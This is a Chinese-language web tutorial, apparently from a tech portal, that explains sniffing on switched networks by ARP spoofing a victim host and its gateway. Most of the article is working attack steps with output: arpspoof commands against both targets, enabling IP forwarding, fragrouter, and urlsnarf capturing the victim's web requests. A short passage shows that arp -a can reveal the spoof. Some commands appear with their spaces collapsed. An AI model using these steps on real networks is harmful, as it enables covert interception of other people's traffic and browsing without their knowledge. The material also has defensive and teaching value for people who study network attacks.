对交换环境下Sniffer的阐述

企业动态
我们今天主要向大家讲述的是交换环境下的Sniffer,以及对在交换环境中使用NetXray或者NAISniffer一类的嗅探工具除去抓到自己的包以外的相关内容讲述。

此文章主要向大家描述的是交换环境下的Sniffer,通常在局域网环境中,我们都是通过交换环境的网关上网的,在交换环境中使用NetXray或者NAISniffer一类的嗅探工具除了抓到自己的包以外,是不能看到其他主机的网络通信的。

通常在局域网环境中,我们都是通过交换环境的网关上网的,在交换环境中使用NetXray或者NAISniffer一类的嗅探工具除了抓到自己的包以外,是不能看到其他主机的网络通信的。

 

但是我们可以通过利用ARP欺骗可以实现Sniffer的目的。

ARP协议是将IP解析为MAC地址的协议,局域网中的通信都是基于MAC的。

例如下面这样的情况:

在局域网中192.168.0.24和192.168.0.29都是通过网关192.168.0.1上网的,假定攻击者的系统为192.168.0.24,他希望听到192.168.0.29的通信,那么我们就可以利用ARP欺骗实现。

1、首先告诉192.168.0.29,网关192.168.0.1的MAC地址是192.168.0.24

2、告诉192.168.0.1,192.168.0.29的MAC地址是192.168.0.24。

这样192.168.0.29和192.168.0.1之间的数据包,就会发给192.168.0.24,也就是攻击者的机器,这样就可以听到会话了。但是这么做的有一个问题,192.168.0.29发现自己不能上网了,因为原来发给192.168.0.1的数据包都被192.168.0.24接收了,而并没有发给网关192.168.0.1。

这时候192.168.0.24设置一个包转发的东西就可以解决这个问题了,也就是从192.168.0.29收到的包转发给192.168.0.1,在把从192.168.0.1收到的包发给192.168.0.29。这样192.168.0.29根本就不会意识到自己被监听了。

具体实现:

1、欺骗192.168.0.29,告诉这台机器网关192.168.0.1的MAC地址是自己(192.168.0.24)。

[root@Linuxdsniff-2.3]#./arpspoof-ieth0-t192.168.0.29192.168.0.1

0:50:56:40:7:710:0:86:61:6b:4e080642:arpreply192.168.0.1is-at0:50:56:40:7:71

0:50:56:40:7:710:0:86:61:6b:4e080642:arpreply192.168.0.1is-at0:50:56:40:7:71

0:50:56:40:7:710:0:86:61:6b:4e080642:arpreply192.168.0.1is-at0:50:56:40:7:71

0:50:56:40:7:710:0:86:61:6b:4e080642:arpreply192.168.0.1is-at0:50:56:40:7:71

0:0:21:0:0:180:0:86:61:6b:4e080642:arpreply192.168.0.1is-at0:0:21:0:0:18

………………………………..

这时候对192.168.0.29的ARP欺骗就开始了。

2、欺骗192.168.0.1,告诉网关192.168.0.29的MAC地址是自己(192.168.0.24)。

[root@Linuxdsniff-2.3]#./arpspoof-ieth0-t192.168.0.1192.168.0.29

0:50:56:40:7:710:0:21:0:0:18080642:arpreply192.168.0.29is-at0:50:56:40:7:71

0:50:56:40:7:710:0:21:0:0:18080642:arpreply192.168.0.29is-at0:50:56:40:7:71

0:50:56:40:7:710:0:21:0:0:18080642:arpreply192.168.0.29is-at0:50:56:40:7:71

0:0:86:61:6b:4e0:0:21:0:0:18080642:arpreply192.168.0.29is-at0:0:86:61:6b:4e

0:0:86:61:6b:4e0:0:21:0:0:18080642:arpreply192.168.0.29is-at0:0:86:61:6b:4e

0:0:86:61:6b:4e0:0:21:0:0:18080642:arpreply192.168.0.29is-at0:0:86:61:6b:4e

其实在这个时候192.168.0.29是可以发现的自己被欺骗了。在CMD下面使用ARP–a命令:

C:\WINNT>arp-a

Interface:192.168.0.29onInterface0x1000003

InternetAddressPhysicalAddressType

192.168.0.100-50-56-40-07-71dynamic

192.168.0.2400-50-56-40-07-71dynamic

两个IP地址的MAC地址居然是一模一样的!不过很少有人会这么做:-)。

3、设置一个包转发

[root@Linuxfragrouter-1.6]#./fragrouter-B1

fragrouter:base-1:normalIPforwarding

在这之前别忘了首先需要打开包转发的功能

[root@Linux/proc]#echo1>/proc/sys/net/ipv4/ip_forward

万事具备,可以开始SNIFFER了。

例如想看看192.168.0.29在浏览什么地方:

[root@Linuxdsniff-2.3]#./urlsnarf

urlsnarf:listeningoneth0[tcpport80orport8080orport3128]

Kitty[18/May/2002:20:02:25+1100]"GEThttp://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb?topicID=29.topic&index=7HTTP/1.1"--"http://www.google.com/search?hl=zh-CN&ie=UTF8&oe=UTF8&q=fdfds&btnG=Google%E6%90%9C%E7%B4%A2&lr=""Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.0)"

Kitty--[18/May/2002:20:02:28+1100]"GEThttp://www.ezboard.com/ztyles/default.cssHTTP/1.1"--"http://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb?topicID=29.topic&index=7""Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.0)"

Kitty--[18/May/2002:20:02:29+1100]"GEThttp://www1.ezboard.com/spch.js?customerid=1147458082HTTP/1.1"--"http://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb?topicID=29.topic&index=7""Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.0)"

当然也可以知道其他………:-)

以上的相关内容就是对交换环境下的Sniffer 的介绍,望你能有所收获。

【编辑推荐】

  1. 网络嗅探教程:使用Sniffer Pro监控ARP协议欺骗
  2. 教你使用Anti ARP Sniffer查找ARP攻击者
  3. 网络嗅探教程:使用Sniffer Pro监控网络流量
  4. 用Sniffer和ARP分析网络问题
  5. 使用Sniffer截获流经本机网卡的IP数据包
责任编辑:佚名 来源: 中国IT实验室
相关推荐

2010-10-09 10:05:05

2010-07-19 14:17:47

SQL Server内

2010-10-09 09:05:58

2009-12-01 18:41:08

SUSE Linux

2010-10-09 17:02:13

2010-04-02 10:12:07

无线交换机管理优势

2010-03-22 17:44:18

核心交换机

2010-08-06 13:20:00

DB2锁等待

2021-06-29 12:10:48

CentOSMySQL工具

2010-01-12 18:00:30

Visual C++

2010-03-18 17:01:52

Cisco交换机

2010-03-16 15:24:15

四层交换机

2010-10-09 14:38:40

2010-08-02 11:38:43

DB2外部文件格式

2010-03-11 09:40:11

管理型交换机

2009-09-08 09:30:00

2009-06-24 08:46:16

2009-07-15 14:19:07

2010-04-19 15:21:40

无线交换机

2009-12-01 11:01:39

交叉编译环境构建
点赞
收藏

51CTO技术栈公众号